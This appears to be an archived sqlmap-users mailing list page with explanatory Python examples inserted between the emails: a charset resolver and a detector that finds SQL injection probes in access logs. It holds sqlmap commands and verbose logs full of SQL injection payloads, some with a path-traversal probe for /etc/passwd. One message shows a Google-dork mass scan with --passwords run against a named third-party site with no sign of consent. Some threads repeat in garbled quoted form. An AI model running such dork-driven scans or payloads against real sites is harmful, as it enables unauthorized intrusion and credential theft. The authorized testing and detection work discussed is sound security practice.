sqlmap-users Mailing List for sqlmap (Page 12)
Brought to you by: inquisb
From: Brandon P. <bpe...@gm...> - 2015-05-28 18:59:19

Flex is hard because you have to update the integer that tells flex how long a string is, unless I am mistaken. If not, you could try with the * marker to tell sqlmap exactly where the injection point is.

--
http://volatile-minds.blogspot.com -- blog
http://www.volatileminds.net -- website

From: Christopher D. <chr...@ch...> - 2015-05-28 18:52:24

Good afternoon gents,

I am a professional penetration tester and have a rather difficult injection point for one of my customers.

I can trigger the exception by pausing traffic with burp and inserting NULLs into the user | pass via a back end flex call. Is there a way to take advantage of sqlmap to inject via flex remoting objects?

If not I will have to write this myself but I thought I may ask the list first.

Thanks.

Sincerely,
Christopher M Downs

--
Chris Downs | System Administrator
main 888.781.0088
email chr...@ch...
web www.chromeriver.com

From: Miroslav S. <mir...@gm...> - 2015-05-25 14:02:14

Hi Daniel.

Thank you for your report. This should have been "patched" a long time ago. Please update to the latest revision from our GitHub repository to have it up to date (https://github.com/sqlmapproject/sqlmap/).

Kind regards,
Miroslav Stampar

--
Miroslav Stampar
http://about.me/stamparm

From: Daniel D. <dan...@gm...> - 2015-05-23 19:34:19

*Reporting*
[20:21:53] [WARNING] unknown web page charset 'gbk2312'. Please report by e-mail to sql...@li....

*Command*
sqlmap -g inurl:"showpro.asp?id=" --random-agent --batch --passwords

*Terminal Readout*
GET http://www.sh-sinap.com/en/Showpro.asp?id=6
do you want to test this URL? [Y/n/q]
> Y
[20:21:30] [INFO] testing URL 'http://www.sh-sinap.com/en/Showpro.asp?id=6'
[20:21:40] [INFO] testing connection to the target URL
[20:21:46] [INFO] testing if the target URL is stable. This can take a couple of seconds
[20:21:50] [INFO] target URL is stable
[20:21:50] [INFO] testing if GET parameter 'id' is dynamic
[20:21:51] [WARNING] GET parameter 'id' does not appear dynamic
[20:21:52] [WARNING] heuristic (basic) test shows that GET parameter 'id' might not be injectable
[20:21:52] [INFO] testing for SQL injection on GET parameter 'id'
[20:21:52] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
*[20:21:53] [WARNING] unknown web page charset 'gbk2312'. Please report by e-mail to sql...@li... <sql...@li...>.*
[20:21:53] [INFO] heuristics detected web page charset 'GB2312'
[20:22:08] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[20:22:20] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[20:22:28] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[20:22:39] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[20:22:46] [INFO] testing 'MySQL inline queries'
[20:22:47] [INFO] testing 'PostgreSQL inline queries'
[20:22:51] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[20:22:53] [INFO] testing 'Oracle inline queries'
[20:22:55] [INFO] testing 'SQLite inline queries'
[20:22:56] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[20:22:56] [CRITICAL] there is considerable lagging in connection response(s). Please use as high value for option '--time-sec' as possible (e.g. 10 or more)
[20:23:07] [INFO] testing 'PostgreSQL > 8.1 stacked queries'
[20:23:16] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[20:23:25] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[20:23:32] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
sqlmap got a 302 redirect to 'http://www.sh-sinap.com:80/en/Showpro.asp'. Do you want to follow? [Y/n] Y
[20:23:39] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[20:23:47] [INFO] testing 'Oracle AND time-based blind'
[20:24:00] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[20:25:38] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[20:25:38] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms'
[20:27:14] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is going to retry the request
[20:27:45] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is going to retry the request
[20:28:16] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is going to retry the request
[20:28:47] [CRITICAL] connection timed out to the target URL or proxy
[20:29:10] [WARNING] user aborted during detection phase
how do you want to proceed? [(S)kip current test/(e)nd detection phase/(n)ext parameter/(c)hange verbosity/(q)uit] n
[20:29:22] [WARNING] GET parameter 'id' is not injectable
[20:29:22] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp'), skipping to the next URL
[20:29:22] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 15 times

Regards
Dan

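The warning in the report above, and the reply saying it has since been fixed, both turn on a declared charset label ('gbk2312') that the tool's codec registry did not recognise before its heuristics settled on GB2312. The following is an added example, not sqlmap's own code: it resolves a declared charset in stages (the cleaned label itself, a small alias table, a label sniffed from the body, a strict trial decode, a last-resort fallback) and reports which stage produced the answer so the caller knows how much to trust it. The alias table entries other than 'gbk2312' and the sample bytes are constructed for illustration.

```python
"""Resolve a declared web-page charset to a codec the runtime actually has.

Added example (not sqlmap's code) for the 'unknown web page charset
gbk2312' report in the thread.  A charset label taken from an HTTP header
or a <meta> tag is often misspelt or a vendor alias the codec registry
rejects, so the label is resolved in stages and the stage is returned
alongside the codec name.
"""
import codecs
import re

# Labels seen in the wild that Python's codec registry does not know.
# 'gbk2312' is the one from the report; the second entry is a constructed
# illustration of the same kind of fix.
ALIASES = {
    "gbk2312": "gb2312",
    "iso-8859-8-i": "iso-8859-8",
}

# Trial-decode order for content sniffing.  Only multi-byte codecs are tried:
# they reject invalid sequences, whereas single-byte codecs accept any input
# and would mask a wrong guess.
CANDIDATES = ("utf-8", "gb2312", "gbk", "big5", "shift_jis", "euc-kr")

META_RE = re.compile(rb"""charset\s*=\s*["']?\s*([A-Za-z0-9_.:-]+)""", re.IGNORECASE)


def clean_label(label):
    """Lower-case the label and drop quotes, whitespace and stray punctuation."""
    return re.sub(r"[^a-z0-9_.:-]", "", label.lower())


def lookup(label):
    """Return the canonical codec name for label, or None if the registry rejects it."""
    try:
        return codecs.lookup(label).name
    except LookupError:
        return None


def resolve_charset(label, body=b""):
    """Return (codec_name, stage); stage is 'declared', 'alias', 'meta',
    'content' or 'fallback' and tells the caller how much to trust the result."""
    cleaned = clean_label(label or "")
    if cleaned:
        name = lookup(cleaned)
        if name:
            return name, "declared"
        if cleaned in ALIASES:
            return lookup(ALIASES[cleaned]), "alias"
    # The body may carry its own declaration, and it is sometimes the correct one.
    m = META_RE.search(body[:4096])
    if m:
        sniffed = clean_label(m.group(1).decode("ascii", "ignore"))
        name = lookup(sniffed)
        if name is None and sniffed in ALIASES:
            name = lookup(ALIASES[sniffed])
        if name:
            return name, "meta"
    # Trial decode: the first strict codec that accepts the whole body wins.
    if body:
        for candidate in CANDIDATES:
            try:
                body.decode(candidate)
            except UnicodeDecodeError:
                continue
            return lookup(candidate), "content"
    # Nothing fit; latin-1 maps every byte value, so later decoding cannot fail.
    return lookup("latin-1"), "fallback"


if __name__ == "__main__":
    # Constructed inputs: the label from the report, and GB2312 bytes for "中文".
    for label, body in (("gbk2312", b""), ("nonsense", b"\xd6\xd0\xce\xc4"),
                        ("nonsense", b'<meta charset="gbk2312">'), ("", b"")):
        print(repr(label), "->", resolve_charset(label, body))
```

The stage name is the useful part for a scanner: a 'content' or 'fallback' result should be treated as a guess (and, as the report shows, logged for the maintainer), while 'declared' and 'alias' results can be decoded with confidence.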
From: Alistair J. <amc...@gm...> - 2015-04-29 14:19:15

In the end, it was WAF behaviour that was preventing sqlmap from identifying the parameter as injectable (more specifically, sqlmap was sending SQL operators in upper case and the WAF was rejecting it). The lower-case tamper script circumvented this but I was unable to take exploitation any further because of other WAF blocking techniques.

On Thu, Apr 30, 2015 at 12:13 AM, Johnathon Doe <hoo...@gm...> wrote:
> Curious, have you tried using the --prefix and --suffix options to frame your injection to see if that helps?
>
> On Wed, Apr 29, 2015 at 2:10 AM, Alistair Johnson <amc...@gm...> wrote:
>> OK. You're right in that the following lines in your dummy output should produce discernible responses when tested against the application:
>> PackageSelection' AND 1595=1103 AND 'cBLQ'='cBLQ
>> PackageSelection' AND 1559=1559 AND 'uIvd'='uIvd
>>
>> I've verified this manually. Thanks and I'll send you the traffic output file.
>>
>> Cheers,
>>
>> Alistair.
>>
>> On Wed, Apr 29, 2015 at 4:57 PM, Miroslav Stampar <mir...@gm...> wrote:
>>> I would say that you screwed something up. Can you please send that traffic file I requested.
>>>
>>> Down below find a line that says: "[08:55:08] [PAYLOAD] PackageSelection' AND 1595=1103 AND 'cBLQ'='cBLQ". That is the proof that your claims are invalid.
>>>
>>> $ python sqlmap.py -u www.site.com/help/UserGuide.aspx?Sec=PackageSelection --dummy -v 3
>>>          _
>>>  ___ ___| |_____ ___ ___  {1.0-dev-03f32ae}
>>> |_ -| . | |     | .'| . |
>>> |___|_  |_|_|_|_|__,|  _|
>>>       |_|           |_|   http://sqlmap.org
>>>
>>> [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
>>>
>>> [*] starting at 08:55:05
>>>
>>> [08:55:05] [DEBUG] cleaning up configuration parameters
>>> [08:55:05] [DEBUG] setting the HTTP timeout
>>> [08:55:05] [DEBUG] creating HTTP requests opener object
>>> [08:55:05] [DEBUG] heuristically checking if the target is protected by some kind of WAF/IPS/IDS
>>> [08:55:05] [PAYLOAD] WVJJ=8692 AND 1=1 UNION ALL SELECT 1,2,3,table_name FROM information_schema.tables WHERE 2>1-- ../../../etc/passwd
>>> [08:55:05] [DEBUG] setting match ratio for current parameter to 0.743
>>> [08:55:05] [INFO] testing if the target URL is stable. This can take a couple of seconds
>>> [08:55:06] [WARNING] target URL is not stable. sqlmap will base the page comparison on a sequence matcher. If no dynamic nor injectable parameters are detected, or in case of junk results, refer to user's manual paragraph 'Page comparison' and provide a string or regular expression to match on
>>> how do you want to proceed? [(C)ontinue/(s)tring/(r)egex/(q)uit]
>>> [08:55:08] [INFO] searching for dynamic content
>>> [08:55:08] [DEBUG] setting match ratio for current parameter to 0.446
>>> [08:55:08] [CRITICAL] target URL is heavily dynamic. sqlmap is going to retry the request
>>> [08:55:08] [INFO] searching for dynamic content
>>> [08:55:08] [INFO] testing if GET parameter 'Sec' is dynamic
>>> [08:55:08] [PAYLOAD] 2485
>>> [08:55:08] [DEBUG] setting match ratio for current parameter to 0.867
>>> [08:55:08] [INFO] confirming that GET parameter 'Sec' is dynamic
>>> [08:55:08] [PAYLOAD] 8682
>>> [08:55:08] [INFO] GET parameter 'Sec' is dynamic
>>> [08:55:08] [PAYLOAD] PackageSelection)"'.)"").'
>>> [08:55:08] [WARNING] heuristic (basic) test shows that GET parameter 'Sec' might not be injectable
>>> [08:55:08] [PAYLOAD] PackageSelection'LcAd<'">Hovs
>>> [08:55:08] [INFO] testing for SQL injection on GET parameter 'Sec'
>>> [08:55:08] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
>>> [08:55:08] [PAYLOAD] PackageSelection) AND 4774=3078 AND (8643=8643
>>> [08:55:08] [DEBUG] setting match ratio for current parameter to 0.833
>>> [08:55:08] [PAYLOAD] PackageSelection) AND 1559=1559 AND (3186=3186
>>> [08:55:08] [PAYLOAD] PackageSelection AND 8581=4897
>>> [08:55:08] [DEBUG] setting match ratio for current parameter to 0.851
>>> [08:55:08] [PAYLOAD] PackageSelection AND 1559=1559
>>> [08:55:08] [PAYLOAD] PackageSelection') AND 6273=6522 AND ('YHvu'='YHvu
>>> [08:55:08] [DEBUG] setting match ratio for current parameter to 0.554
>>> [08:55:08] [PAYLOAD] PackageSelection') AND 1559=1559 AND ('sTiQ'='sTiQ
>>> [08:55:08] [PAYLOAD] PackageSelection') AND 3601=4813 AND ('ParN'='ParN
>>> [08:55:08] [PAYLOAD] PackageSelection' AND 1595=1103 AND 'cBLQ'='cBLQ
>>> [08:55:08] [DEBUG] setting match ratio for current parameter to 0.745
>>> [08:55:08] [PAYLOAD] PackageSelection' AND 1559=1559 AND 'uIvd'='uIvd
>>> [08:55:08] [PAYLOAD] PackageSelection' AND 8619=5317 AND 'RtrE'='RtrE
>>> [08:55:08] [PAYLOAD] PackageSelection%' AND 3991=4465 AND '%'='
>>> [08:55:08] [DEBUG] setting match ratio for current parameter to 0.495
>>> [08:55:08] [PAYLOAD] PackageSelection%' AND 1559=1559 AND '%'='
>>> [08:55:08] [PAYLOAD] PackageSelection%' AND 5263=7541 AND '%'='
>>> [08:55:08] [PAYLOAD] PackageSelection AND 8168=8736-- pZYt
>>> [08:55:08] [DEBUG] setting match ratio for current parameter to 0.685
>>> [08:55:08] [PAYLOAD] PackageSelection AND 1559=1559-- NfAy
>>> ...
>>>
>>> On Tue, Apr 28, 2015 at 3:15 PM, Alistair Johnson <amc...@gm...> wrote:
>>>> Hi Brandon,
>>>>
>>>> Thanks for your comment. Confirming that I've tried risk=3 with level=5 with the same results. I've looked more closely at the requests that sqlmap is sending to check if the parameter is injectable. It is testing the Sec parameter with values such as:
>>>>
>>>> PackageSelection) AND 1477=7114
>>>> PackageSelection) AND 1631=1631
>>>> PackageSelection') AND 5603=7729
>>>> PackageSelection') AND 1631=1631
>>>> PackageSelection' AND 3943=9381
>>>> PackageSelection' AND 1631=1631
>>>> PackageSelection" AND 3324=4690
>>>> PackageSelection" AND 1631=1631
>>>> PackageSelection) AND 4734=6616 AND (6346=6346
>>>> PackageSelection)) AND 7350=9272 AND (8861=8861
>>>>
>>>> When in fact, I assume it would need to use logic like I used to get distinguishable responses:
>>>>
>>>> PackageSelection (returns response A)
>>>> PackageSelection' AND '1'='1 (returns response A)
>>>> PackageSelection' AND '1'='2 (returns response B)
>>>>
>>>> In a nutshell, it doesn't appear to be trying single quotes and values in the ' AND '1'='1 pattern. But I would have thought this is a pretty typical format for checking boolean-based blind SQLi.
>>>>
>>>> Cheers,
>>>>
>>>> Alistair.
>>>>
>>>> On Tue, Apr 28, 2015 at 10:36 PM, Brandon Perry <bpe...@gm...> wrote:
>>>>> It's a GET, so there wouldn't be a content type, unless I am mistaken.
>>>>>
>>>>> Alistair, have you tried --risk=3 with --level=5 yet?
>>>>>
>>>>> Sent from a phone
>>>>>
>>>>> On Apr 28, 2015, at 7:13 AM, Miroslav Stampar <mir...@gm...> wrote:
>>>>>
>>>>> Can you please send the unredacted content of request.txt to my address?
>>>>>
>>>>> If not, then please at least send me the content of traffic file which you can obtain by just appending the "-t traffic.txt" to the regular sqlmap's run.
>>>>>
>>>>> Bye
>>>>>
>>>>> On Tue, Apr 28, 2015 at 2:10 PM, Alistair Johnson <amc...@gm...> wrote:
>>>>>> Thanks for the quick reply.
>>>>>>
>>>>>> The contents of the request file are as follows:
>>>>>>
>>>>>> GET /help/UserGuide.aspx?Sec=PackageSelection HTTP/1.1
>>>>>> Host: <redacted>
>>>>>> Accept: */*
>>>>>> Accept-Language: en
>>>>>> User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
>>>>>> Connection: close
>>>>>> Referer: <redacted>
>>>>>> Cookie: <redacted>
>>>>>>
>>>>>> I've redacted some of the details as it's not appropriate to draw attention to an internet facing application's SQLi vulnerability.
>>>>>>
>>>>>> When providing the request file as part of the following command:
>>>>>> sqlmap -r '<request file>' -p 'Sec' --dbms 'Microsoft SQL Server' --level=4 --proxy=http://127.0.0.1:8080 --technique=B --string 'industries' -v 1
>>>>>>
>>>>>> sqlmap executes as normal but cannot identify (and therefore cannot exploit) the boolean-based blind vulnerability which I've verified manually.
>>>>>>
>>>>>> Thanks again,
>>>>>>
>>>>>> Al.
>>>>>>
>>>>>> On Tue, Apr 28, 2015 at 9:59 PM, Miroslav Stampar <mir...@gm...> wrote:
>>>>>>> And what is the content of request file?
>>>>>>>
>>>>>>> Bye
>>>>>>>
>>>>>>> On Tue, Apr 28, 2015 at 1:03 PM, Alistair Johnson <amc...@gm...> wrote:
>>>>>>>> Hi sqlmappers,
>>>>>>>>
>>>>>>>> I'm a fairly experienced user of sqlmap having used it extensively in the past. I came across what appeared to be pretty typical boolean-based blind SQLi in an application I'm (legally) testing. However, for the first time, I'm unable to get sqlmap to recognise the parameter as vulnerable to exploit it further. And as we know, manually exploiting blind SQLi is cumbersome to say the least.
>>>>>>>>
>>>>>>>> Here is a summary of the requests I've made to manually confirm the vulnerability.
>>>>>>>>
>>>>>>>> /help/UserGuide.aspx?Sec=PackageSelection (returns response A)
>>>>>>>> /help/UserGuide.aspx?Sec=PackageSelection'+and+'1'='1 (returns response A)
>>>>>>>> /help/UserGuide.aspx?Sec=PackageSelection'+and+'1'='2 (returns response B)
>>>>>>>>
>>>>>>>> I've tried various sqlmap flags and thought the following command would give me the best chance of success:
>>>>>>>>
>>>>>>>> sqlmap -r '<request file>' -p 'Sec' --dbms 'Microsoft SQL Server' --level=4 --proxy=http://127.0.0.1:8080 --technique=B --string 'industries' -v 1
>>>>>>>>
>>>>>>>> Note: the string 'industries' is text that appears in response A but not response B.
>>>>>>>>
>>>>>>>> I've looked at the requests that sqlmap is sending in the background (proxied through burp). It appears that it's attempting to exploit this with the AND statement as it should but is not using single quotes as per my example above.
>>>>>>>>
>>>>>>>> I'd appreciate any insight. If this is a shortcoming in sqlmap, I'd be more than happy to contribute some time to improve it so it can identify injectable parameters such as these in the future.
>>>>>>>>
>>>>>>>> Thanks,
>>>>>>>>
>>>>>>>> Al.
>>>>>>>>
>>>>>>>> _______________________________________________
>>>>>>>> sqlmap-users mailing list
>>>>>>>> sql...@li...
>>>>>>>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>>>>>>>
>>>>>>> --
>>>>>>> Miroslav Stampar
>>>>>>> http://about.me/stamparm
>>>>>
>>>>> --
>>>>> Miroslav Stampar
>>>>> http://about.me/stamparm
>>>
>>> --
>>> Miroslav Stampar
>>> http://about.me/stamparm

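The WAF finding that closes this thread (upper-case SQL operators blocked, the lower-case tamper script not) has a defender-side mirror: a detection rule that keys on operator case misses the same probes. The following is an added example, not code from the thread or from sqlmap. It assumes combined-format web access logs and uses constructed sample lines whose payload shapes copy the ones quoted above; client addresses and response sizes are made up. It percent-decodes and case-folds each query-string value before matching, and reports a parameter that received both a true comparison (N=N) and a false one (N=M) from the same client, which is the pair a boolean-blind detection pass must send to compare two responses.

```python
"""Spot boolean-based blind SQLi probes in web access logs.

Added example (not from the thread or from sqlmap).  Matching is done on the
URL-decoded, case-folded parameter value so that 'AND', 'and' and 'aNd' are
all the same probe, and a parameter that received both a true (N=N) and a
false (N=M) comparison from one client is flagged as a probe pair.
"""
import re
from collections import defaultdict
from urllib.parse import parse_qsl, urlsplit

# Constructed sample lines in combined log format.  The payload shapes copy
# the ones quoted in the thread; addresses and sizes are made up.
SAMPLE_LOG = """\
10.0.0.5 - - [28/Apr/2015:08:55:08 +0000] "GET /help/UserGuide.aspx?Sec=PackageSelection HTTP/1.1" 200 5120
10.0.0.5 - - [28/Apr/2015:08:55:08 +0000] "GET /help/UserGuide.aspx?Sec=PackageSelection%27%20AND%201595%3D1103%20AND%20%27cBLQ%27%3D%27cBLQ HTTP/1.1" 200 4870
10.0.0.5 - - [28/Apr/2015:08:55:08 +0000] "GET /help/UserGuide.aspx?Sec=PackageSelection%27%20AND%201559%3D1559%20AND%20%27uIvd%27%3D%27uIvd HTTP/1.1" 200 5120
10.0.0.5 - - [28/Apr/2015:08:55:09 +0000] "GET /help/UserGuide.aspx?Sec=PackageSelection%27+and+%271%27%3D%271 HTTP/1.1" 200 5120
10.0.0.9 - - [28/Apr/2015:08:56:01 +0000] "GET /help/UserGuide.aspx?Sec=Billing HTTP/1.1" 200 5002
"""

REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3}) (?P<size>\d+|-)'
)

# AND/OR followed by X=Y, each side a number or a (possibly quoted) word.
# IGNORECASE is the point: a case-sensitive rule is what the tamper script beat.
PROBE_RE = re.compile(r"\b(?:and|or)\s+(?P<lhs>'?\w+'?)\s*=\s*(?P<rhs>'?\w+'?)", re.IGNORECASE)


def parse_line(line):
    """Split one combined-format line into client, timestamp, path and query
    parameters; return None for lines that are not request lines."""
    m = REQUEST_RE.match(line)
    if not m:
        return None
    target = urlsplit(m.group("target"))
    # parse_qsl percent-decodes and maps '+' to space, so the value
    # "PackageSelection%27+and+%271%27%3D%271" comes back as
    # "PackageSelection' and '1'='1", ready for matching.
    params = parse_qsl(target.query, keep_blank_values=True)
    return {"ip": m.group("ip"), "ts": m.group("ts"),
            "path": target.path, "params": params}


def classify_probes(value):
    """Return [(kind, lhs, rhs), ...] for every comparison probe in a decoded
    value: kind is "true" when both sides are equal (1559=1559, '1'='1) and
    "false" otherwise (1595=1103)."""
    found = []
    for m in PROBE_RE.finditer(value):
        lhs = m.group("lhs").strip("'")
        rhs = m.group("rhs").strip("'")
        found.append(("true" if lhs == rhs else "false", lhs, rhs))
    return found


def scan_log(text):
    """Aggregate probe kinds per (client, path, parameter).  A parameter that
    saw both kinds from one client is 'paired': that true/false pair is what a
    boolean-blind test needs to compare two responses, and it is the signal
    worth alerting on rather than any single odd-looking value."""
    kinds_seen = defaultdict(set)
    for line in text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        for name, value in rec["params"]:
            for kind, _lhs, _rhs in classify_probes(value):
                kinds_seen[(rec["ip"], rec["path"], name)].add(kind)
    return [
        {"ip": ip, "path": path, "param": name,
         "kinds": sorted(kinds), "paired": kinds == {"true", "false"}}
        for (ip, path, name), kinds in sorted(kinds_seen.items())
    ]


if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        flag = "PAIRED boolean probe" if finding["paired"] else "single probe"
        print(f'{finding["ip"]} {finding["path"]} param={finding["param"]} '
              f'{finding["kinds"]} -> {flag}')
```

Decoding before matching matters as much as case-folding: the same probe arrives as `%27%20AND%20` in one client and `'+and+` in another, and a rule written against the raw request line sees neither.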
From: Johnathon D. <hoo...@gm...> - 2015-04-29 14:13:29

Curious, have you tried using the --prefix and --suffix options to frame your injection to see if that helps?

> >> >> >> http://ad.doubleclick.net/ddm/clk/290420510;117567292;y > >> >> >> _______________________________________________ > >> >> >> sqlmap-users mailing list > >> >> >> sql...@li... > >> >> >> https://lists.sourceforge.net/lists/listinfo/sqlmap-users > >> >> > > >> >> > > >> >> > > >> >> > > >> >> > -- > >> >> > Miroslav Stampar > >> >> > http://about.me/stamparm > >> > > >> > > >> > > >> > > >> > -- > >> > Miroslav Stampar > >> > http://about.me/stamparm > >> > > >> > > >> > > ------------------------------------------------------------------------------ > >> > One dashboard for servers and applications across > Physical-Virtual-Cloud > >> > Widest out-of-the-box monitoring support with 50+ applications > >> > Performance metrics, stats and reports that give you Actionable > Insights > >> > Deep dive visibility with transaction tracing using APM Insight. > >> > http://ad.doubleclick.net/ddm/clk/290420510;117567292;y > >> > > >> > _______________________________________________ > >> > sqlmap-users mailing list > >> > sql...@li... > >> > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > > > > > > > > > > -- > > Miroslav Stampar > > http://about.me/stamparm > > > ------------------------------------------------------------------------------ > One dashboard for servers and applications across Physical-Virtual-Cloud > Widest out-of-the-box monitoring support with 50+ applications > Performance metrics, stats and reports that give you Actionable Insights > Deep dive visibility with transaction tracing using APM Insight. > http://ad.doubleclick.net/ddm/clk/290420510;117567292;y > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > |
From: Alistair J. <amc...@gm...> - 2015-04-29 07:10:25
OK. You're right in that the following lines in your dummy output should
produce discernible responses when tested against the application:

PackageSelection' AND 1595=1103 AND 'cBLQ'='cBLQ
PackageSelection' AND 1559=1559 AND 'uIvd'='uIvd

I've verified this manually. Thanks and I'll send you the traffic output file.

Cheers,

Alistair.

On Wed, Apr 29, 2015 at 4:57 PM, Miroslav Stampar <mir...@gm...> wrote:
> I would say that you screwed something up. Can you please send that traffic
> file I requested?
>
> Down below find a line that says: "[08:55:08] [PAYLOAD] PackageSelection'
> AND 1595=1103 AND 'cBLQ'='cBLQ". That is the proof that your claims are
> invalid.
>
> $ python sqlmap.py -u www.site.com/help/UserGuide.aspx?Sec=PackageSelection --dummy -v 3
>     _
>  ___ ___| |_____ ___ ___  {1.0-dev-03f32ae}
> |_ -| . | |     | .'| . |
> |___|_  |_|_|_|_|__,|  _|
>       |_|           |_|   http://sqlmap.org
>
> [!] legal disclaimer: Usage of sqlmap for attacking targets without prior
> mutual consent is illegal. It is the end user's responsibility to obey all
> applicable local, state and federal laws. Developers assume no liability and
> are not responsible for any misuse or damage caused by this program
>
> [*] starting at 08:55:05
>
> [08:55:05] [DEBUG] cleaning up configuration parameters
> [08:55:05] [DEBUG] setting the HTTP timeout
> [08:55:05] [DEBUG] creating HTTP requests opener object
> [08:55:05] [DEBUG] heuristically checking if the target is protected by some kind of WAF/IPS/IDS
> [08:55:05] [PAYLOAD] WVJJ=8692 AND 1=1 UNION ALL SELECT 1,2,3,table_name FROM information_schema.tables WHERE 2>1-- ../../../etc/passwd
> [08:55:05] [DEBUG] setting match ratio for current parameter to 0.743
> [08:55:05] [INFO] testing if the target URL is stable. This can take a couple of seconds
> [08:55:06] [WARNING] target URL is not stable. sqlmap will base the page comparison on a sequence matcher. If no dynamic nor injectable parameters are detected, or in case of junk results, refer to user's manual paragraph 'Page comparison' and provide a string or regular expression to match on
> how do you want to proceed? [(C)ontinue/(s)tring/(r)egex/(q)uit]
> [08:55:08] [INFO] searching for dynamic content
> [08:55:08] [DEBUG] setting match ratio for current parameter to 0.446
> [08:55:08] [CRITICAL] target URL is heavily dynamic. sqlmap is going to retry the request
> [08:55:08] [INFO] searching for dynamic content
> [08:55:08] [INFO] testing if GET parameter 'Sec' is dynamic
> [08:55:08] [PAYLOAD] 2485
> [08:55:08] [DEBUG] setting match ratio for current parameter to 0.867
> [08:55:08] [INFO] confirming that GET parameter 'Sec' is dynamic
> [08:55:08] [PAYLOAD] 8682
> [08:55:08] [INFO] GET parameter 'Sec' is dynamic
> [08:55:08] [PAYLOAD] PackageSelection)"'.)"").'
> [08:55:08] [WARNING] heuristic (basic) test shows that GET parameter 'Sec' might not be injectable
> [08:55:08] [PAYLOAD] PackageSelection'LcAd<'">Hovs
> [08:55:08] [INFO] testing for SQL injection on GET parameter 'Sec'
> [08:55:08] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
> [08:55:08] [PAYLOAD] PackageSelection) AND 4774=3078 AND (8643=8643
> [08:55:08] [DEBUG] setting match ratio for current parameter to 0.833
> [08:55:08] [PAYLOAD] PackageSelection) AND 1559=1559 AND (3186=3186
> [08:55:08] [PAYLOAD] PackageSelection AND 8581=4897
> [08:55:08] [DEBUG] setting match ratio for current parameter to 0.851
> [08:55:08] [PAYLOAD] PackageSelection AND 1559=1559
> [08:55:08] [PAYLOAD] PackageSelection') AND 6273=6522 AND ('YHvu'='YHvu
> [08:55:08] [DEBUG] setting match ratio for current parameter to 0.554
> [08:55:08] [PAYLOAD] PackageSelection') AND 1559=1559 AND ('sTiQ'='sTiQ
> [08:55:08] [PAYLOAD] PackageSelection') AND 3601=4813 AND ('ParN'='ParN
> [08:55:08] [PAYLOAD] PackageSelection' AND 1595=1103 AND 'cBLQ'='cBLQ
> [08:55:08] [DEBUG] setting match ratio for current parameter to 0.745
> [08:55:08] [PAYLOAD] PackageSelection' AND 1559=1559 AND 'uIvd'='uIvd
> [08:55:08] [PAYLOAD] PackageSelection' AND 8619=5317 AND 'RtrE'='RtrE
> [08:55:08] [PAYLOAD] PackageSelection%' AND 3991=4465 AND '%'='
> [08:55:08] [DEBUG] setting match ratio for current parameter to 0.495
> [08:55:08] [PAYLOAD] PackageSelection%' AND 1559=1559 AND '%'='
> [08:55:08] [PAYLOAD] PackageSelection%' AND 5263=7541 AND '%'='
> [08:55:08] [PAYLOAD] PackageSelection AND 8168=8736-- pZYt
> [08:55:08] [DEBUG] setting match ratio for current parameter to 0.685
> [08:55:08] [PAYLOAD] PackageSelection AND 1559=1559-- NfAy
> ...
>
> On Tue, Apr 28, 2015 at 3:15 PM, Alistair Johnson <amc...@gm...> wrote:
>>
>> Hi Brandon,
>>
>> Thanks for your comment. Confirming that I've tried risk=3 with
>> level=5 with the same results. I've looked more closely at the
>> requests that sqlmap is sending to check if the parameter is
>> injectable. It is testing the Sec parameter with values such as:
>>
>> PackageSelection) AND 1477=7114
>> PackageSelection) AND 1631=1631
>> PackageSelection') AND 5603=7729
>> PackageSelection') AND 1631=1631
>> PackageSelection' AND 3943=9381
>> PackageSelection' AND 1631=1631
>> PackageSelection" AND 3324=4690
>> PackageSelection" AND 1631=1631
>> PackageSelection) AND 4734=6616 AND (6346=6346
>> PackageSelection)) AND 7350=9272 AND (8861=8861
>>
>> When in fact, I assume it would need to use logic like I used to get
>> distinguishable responses:
>>
>> PackageSelection (returns response A)
>> PackageSelection' AND '1'='1 (returns response A)
>> PackageSelection' AND '1'='2 (returns response B)
>>
>> In a nutshell, it doesn't appear to be trying single quotes and values
>> in the ' AND '1'='1 pattern. But I would have thought this is a pretty
>> typical format for checking boolean-based blind SQLi.
>>
>> Cheers,
>>
>> Alistair.
>>
>> On Tue, Apr 28, 2015 at 10:36 PM, Brandon Perry <bpe...@gm...> wrote:
>> > It's a GET, so there wouldn't be a content type, unless I am mistaken.
>> >
>> > Alistair, have you tried --risk=3 with --level=5 yet?
>> >
>> > Sent from a phone
>> >
